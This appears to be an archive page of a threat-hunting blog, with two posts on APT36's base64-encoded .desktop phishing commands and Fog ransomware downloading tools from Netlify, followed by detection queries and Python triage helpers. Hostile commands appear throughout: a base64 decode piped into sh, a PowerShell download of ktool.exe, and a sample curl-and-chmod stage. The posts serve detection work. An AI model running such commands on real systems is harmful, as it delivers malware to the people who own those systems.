Posts

Showing posts from December, 2025

336. Adversaries Keep Using Phishing to Compromise Linux Systems

Hello everyone! I already mentioned that threat actors started to use phishing emails to attack Linux systems. No, not globally. At least, for now. So, as you know, APT36 usually uses malicious .desktop files and hides the malicious logic inside encoded data, for example:

sh -c "echo [base64_encoded_data] | base64 -d | sh"

Yes, we can see similar commands executed legitimately, and yes, it's another hunting opportunity:

event_type: "processcreatenix" AND cmdline: ("echo" AND "base64" AND "d" AND "sh")

See you tomorrow!
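The hunting query above is a keyword match, so every hit still needs a look at the decoded payload. The following is an added example (not the post's own code) that mirrors the query over process-creation events and, where the command line really pipes base64 into a shell, decodes the embedded stage for triage; the event field names follow the query, and the events are constructed samples, not real telemetry.

```python
"""Triage helper for the .desktop staging pattern described above.

Added example, not the post's own code. Event field names follow the post's
hunting query (event_type, cmdline); the events below are constructed samples.
"""
import base64
import binascii
import re

# echo <base64> | base64 -d | sh, tolerating quotes, --decode and bash.
STAGER_RE = re.compile(
    r"echo\s+['\"]?([A-Za-z0-9+/=]{16,})['\"]?\s*\|\s*base64\s+(?:-d|--decode)"
    r"\s*\|\s*(?:sh|bash)\b"
)


def matches_hunt_query(event: dict) -> bool:
    """Mirror of the query in the post: a processcreatenix event whose command
    line contains the tokens echo, base64, d and sh (keyword AND, so order and
    surrounding text do not matter)."""
    if event.get("event_type") != "processcreatenix":
        return False
    tokens = {t.lstrip("-") for t in re.split(r"[\s\"'|;&()]+", event.get("cmdline", ""))}
    return {"echo", "base64", "d", "sh"} <= tokens


def decode_staged_payload(cmdline: str):
    """Return the decoded payload when cmdline pipes base64 into a shell, else
    None. Invalid base64 or non-text payloads also yield None so the caller
    falls back to manual review."""
    m = STAGER_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-8")
    except (binascii.Error, UnicodeDecodeError):
        return None


def hunt(events):
    """Run the query over events and attach the decoded payload to each hit."""
    return [
        {"cmdline": e["cmdline"], "decoded": decode_staged_payload(e["cmdline"])}
        for e in events
        if matches_hunt_query(e)
    ]


# Constructed samples. The first mimics the .desktop pattern with a stand-in
# second stage pointing at a reserved name; the second is a benign decode that
# still matches the keyword query (a false positive the hunter has to review).
_STAGE2 = b"curl -s http://example.invalid/stage2 -o /tmp/.x && chmod +x /tmp/.x"
SAMPLE_EVENTS = [
    {"event_type": "processcreatenix",
     "cmdline": f'sh -c "echo {base64.b64encode(_STAGE2).decode()} | base64 -d | sh"'},
    {"event_type": "processcreatenix",
     "cmdline": 'sh -c "echo dGVzdA== | base64 -d"'},
    {"event_type": "processcreatewin",
     "cmdline": 'cmd.exe /c "echo x | base64 -d | sh"'},
    {"event_type": "processcreatenix",
     "cmdline": "/usr/bin/ls -la /home"},
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print(hit["cmdline"])
        print("  decoded:", hit["decoded"])
```

Hits with a decoded payload can be classified straight away; hits where decoding returns None are exactly the ones the query's loose keyword match pulls in, and those go to manual review.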

335. Adversaries Abuse Netlify for Malware Delivery

Hello everyone! Today we'll look at another example of Ingress Tool Transfer (T1105). And this time adversaries used Netlify to store malicious files. According to the report, Fog ransomware affiliates used PowerShell to download malicious files, for example:

iwr -uri 'hxxps://hilarious-trifle-d9182e.netlify[.]app/ktool.exe' -outfile $temppath

As you can see, they used Netlify, a legitimate platform for building, deploying, and scaling web apps, to store those files. To tell the truth, it's not the first time I've seen adversaries use it, so it's another good target for hunting:

event_type: "dnsreqwin" AND dns_rname: "netlify.app"

See you tomorrow!
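Two details matter when turning this into a hunt: the domain test should be a suffix match (a substring match also fires on look-alike names), and a DNS hit is far more useful once it is tied to the PowerShell command that caused it. The following is an added example (not the post's or the report's code) that does both; the field names follow the post's query, "processcreatewin" as the Windows process-creation event type is an assumption, and the events are constructed samples.

```python
"""Hunting helpers for the Netlify-hosted delivery described above.

Added example, not the post's or the report's code. Field names follow the
post's query (event_type, dns_rname, cmdline); "processcreatewin" as the
Windows process-creation event type is an assumption. All events below are
constructed samples.
"""
import re
from urllib.parse import urlparse

# Abused hosting platform from the post; add further suffixes as needed.
HUNTED_SUFFIXES = ("netlify.app",)

# Defanged indicator as quoted from the report in the post.
REPORT_IOCS = ["hxxps://hilarious-trifle-d9182e.netlify[.]app/ktool.exe"]


def refang(ioc: str) -> str:
    """Turn a defanged indicator (hxxp, [.]) back into a parseable URL."""
    return re.sub(r"^hxxp", "http", ioc, flags=re.I).replace("[.]", ".")


def host_matches(name: str, suffix: str) -> bool:
    """True when name equals suffix or is a subdomain of it. A bare substring
    test would also fire on look-alikes such as netlify.app.example.invalid."""
    name = name.lower().rstrip(".")
    return name == suffix or name.endswith("." + suffix)


def dns_hunt(events):
    """The post's query, event_type: "dnsreqwin" AND dns_rname: "netlify.app",
    with proper domain-suffix matching."""
    return [e for e in events
            if e.get("event_type") == "dnsreqwin"
            and any(host_matches(e.get("dns_rname", ""), s) for s in HUNTED_SUFFIXES)]


_URL_RE = re.compile(r"(?:https?|hxxps?)://[^\s'\"]+", re.I)


def download_host(cmdline: str):
    """Host an iwr / Invoke-WebRequest command line fetches from, or None.
    Accepts defanged URLs too, so report IoCs can be fed in directly."""
    if not re.search(r"\b(?:iwr|invoke-webrequest)\b", cmdline, re.I):
        return None
    m = _URL_RE.search(cmdline)
    return urlparse(refang(m.group(0))).hostname if m else None


def process_hunt(events):
    """Process-creation events whose PowerShell download targets a hunted
    platform; pivoting from the DNS hit to this gives the parent command."""
    hits = []
    for e in events:
        if e.get("event_type") != "processcreatewin":
            continue
        host = download_host(e.get("cmdline", ""))
        if host and any(host_matches(host, s) for s in HUNTED_SUFFIXES):
            hits.append(e)
    return hits


SAMPLE_EVENTS = [
    {"event_type": "dnsreqwin", "dns_rname": "hilarious-trifle-d9182e.netlify.app"},
    {"event_type": "dnsreqwin", "dns_rname": "netlify.app.example.invalid"},  # look-alike
    {"event_type": "dnsreqwin", "dns_rname": "www.example.invalid"},
    {"event_type": "processcreatewin",
     "cmdline": "powershell.exe -nop -c \"iwr -uri "
                "'https://hilarious-trifle-d9182e.netlify.app/ktool.exe' "
                "-outfile $env:TEMP\\ktool.exe\""},
    {"event_type": "processcreatewin",
     "cmdline": "powershell.exe -c \"iwr -uri 'https://www.example.invalid/feed.xml'\""},
]

if __name__ == "__main__":
    for e in dns_hunt(SAMPLE_EVENTS):
        print("dns:", e["dns_rname"])
    for e in process_hunt(SAMPLE_EVENTS):
        print("proc:", e["cmdline"])
```

Because Netlify also hosts plenty of legitimate sites, the DNS query alone will produce benign hits; joining them with the process events that initiated the download is what separates a routine web request from a tool transfer.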